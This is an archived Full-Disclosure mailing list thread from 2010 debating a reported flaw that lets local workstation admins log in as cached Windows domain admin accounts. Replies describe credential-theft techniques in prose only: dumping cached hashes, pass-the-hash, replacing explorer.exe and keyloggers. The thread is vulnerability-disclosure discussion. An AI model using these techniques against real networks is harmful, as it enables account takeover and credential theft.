SECURITY registry hive to trick the Microsoft operating system in to performing an action that has a result that is not intended by the software developer. This action is performed on the Active Directory logon account cache that regular local administrators should not have access to. There are always other ways of doing things when it comes to this type of work. Thank you, - StenoPlasma at ExploitDevelopment.com www.ExploitDevelopment.com - Original Message From: Thor (Hammer of God) t...@hammerofgod.com Sent: Thursday, December 09, 2010 6:07 PM To: stenopla...@exploitdevelopment.com stenopla...@exploitdevelopment.com, full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) Why all the trouble? Just change the log files directly when logged in as the local admin. It's a whole lot simpler, and you don't even need the domain administrator to have interactively logged into your workstation. Or is your point that local administrators are, um, local administrators? t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of StenoPlasma @ www.ExploitDevelopment.com Sent: Thursday, December 09, 2010 5:07 PM To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk Cc: stenopla...@exploitdevelopment.com Subject: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local
Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)
You can dump the local cached hashes, take a domain admins, and use a pass the hash attack, which has been around for a while, such as: Hernan Ochoa / http://oss.coresecurity.com/projects/pshtoolkit.htm I don't see this being any more concerning. Whatever you do in the above, is under the other account. Granted, I may be missing something, so enlighten me. -Original Message- From: Mike Hale [mailto:eyeronic.des...@gmail.com] Sent: Thursday, December 09, 2010 7:20 PM To: Thor (Hammer of God) Cc: stenopla...@exploitdevelopment.com; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) In fact, I can just make the Domain Admin a guest on my workstation if I want to and there is nothing they can do about it. With the caveat that they can readd themselves using GP anytime they want...but you know. I just wanted to throw that out there. I think the key vulnerability in this is the non-repudiation one the OP mentioned. Being able to run stuff under the domain admin's account is something a rogue user could potential abuse. I don't think this issue is particularly critical, but something a good admin should be aware of, IMO. On Thu, Dec 9, 2010 at 7:07 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: What do you mean by regular local administrator? You're a local admin, or you're not. There are not degrees of local admin. Why are you under the impression that there are things on a local system that the local admin should not have access to? They can do anything they want to by design. Are you under the impression that the Domain Administrator has different permissions on a local machine than the local administrator does? The only reason a Domain Admin has admin rights by default on a domain workstation is because they simply belong to the local Administrators group. If I, as a local admin, remove the domain admin account from my local Administrators group, then they will not be local admins. In fact, I can just make the Domain Admin a guest on my workstation if I want to and there is nothing they can do about it. Sorry to be the bearer of bad news for you, but the local admin can do what they want to by design, and there is nothing that was not intended by the software developer here. This is, of course, why the people at MSFT dismissed it as noted. t -Original Message- From: StenoPlasma @ ExploitDevelopment [mailto:stenopla...@exploitdevelopment.com] Sent: Thursday, December 09, 2010 6:13 PM To: Thor (Hammer of God); full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) T, My article describes how to use the SECURITY registry hive to trick the Microsoft operating system in to performing an action that has a result that is not intended by the software developer. This action is performed on the Active Directory logon account cache that regular local administrators should not have access to. There are always other ways of doing things when it comes to this type of work. Thank you, - StenoPlasma at ExploitDevelopment.com www.ExploitDevelopment.com - Original Message From: Thor (Hammer of God) t...@hammerofgod.com Sent: Thursday, December 09, 2010 6:07 PM To: stenopla...@exploitdevelopment.com stenopla...@exploitdevelopment.com, full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) Why all the trouble? Just change the log files directly when logged in as the local admin. It's a whole lot simpler, and you don't even need the domain administrator to have interactively logged into your workstation. Or is your point that local administrators are, um, local administrators? t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of StenoPlasma @ www.ExploitDevelopment.com Sent: Thursday, December 09, 2010 5:07 PM To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk Cc: stenopla...@exploitdevelopment.com Subject: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)
Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)
On 12/09/2010 09:36 PM, Mike Vasquez wrote: You can dump the local cached hashes, take a domain admins, My understanding is that after the target user has logged off, the hashes which remain are only sufficient to validate a correct password. I.e., they're like the classic /etc/passwd hashes but with decent salts. They could be used for dictionary attacks, but not with precomputed rainbow tables. and use a pass the hash attack, which has been around for a while, such as: Hernan Ochoa / http://oss.coresecurity.com/projects/pshtoolkit.htm My understanding is that PTH is a technique allowing you to easily use a different kind of hash. The password-equivalent kind that would be copied from the credentials of a live logged-in session. In that sense, PTH on its own may not meet the formal definition of an 'attack', since you still need a way to capture the password-equivalent. I don't see this being any more concerning. Whatever you do in the above, is under the other account. Granted, I may be missing something, so enlighten me. If you're a local admin, you can replace explorer.exe and access resources with the credentials of the logged-in user. If you're a local admin, you can install a keylogger and trivially capture anyone's freaking plaintext password (local console or RDP sessions). So don't type your Domain Admin password into an untrusted system. Duh! Note that any system to which an untrusted party has unsupervised physical access is untrusted. - Marsh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
